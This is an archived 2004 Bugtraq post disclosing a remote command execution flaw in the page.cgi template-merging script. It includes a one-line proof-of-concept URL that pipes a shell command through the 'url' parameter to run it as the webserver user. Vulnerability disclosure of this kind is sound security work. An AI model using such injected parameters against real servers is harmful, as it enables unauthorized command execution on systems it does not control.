[36003] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Remote Command Execution

daemon@ATHENA.MIT.EDU (Francisco Alisson)
Fri Aug 6 15:05:59 2004

Date: 6 Aug 2004 05:10:28 -0000
Message-ID: <20040806051028.21717.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Francisco Alisson <dominusvis@click21.com.br>
To: bugtraq@securityfocus.com



Script affected: page.cgi - content/template merging CGI
Author: Andrew Kilpatrick

We can execute arbitrary commands with same id of the webserver:

http://www.vulnerable.com/page.cgi?url=.html|id|

Thanks :)

<Dominus_Vis>
[Infektion Group]
irc.phey.net -j #infektion

home	help	back	first	fref	pref	prev	next	nref	lref	last	post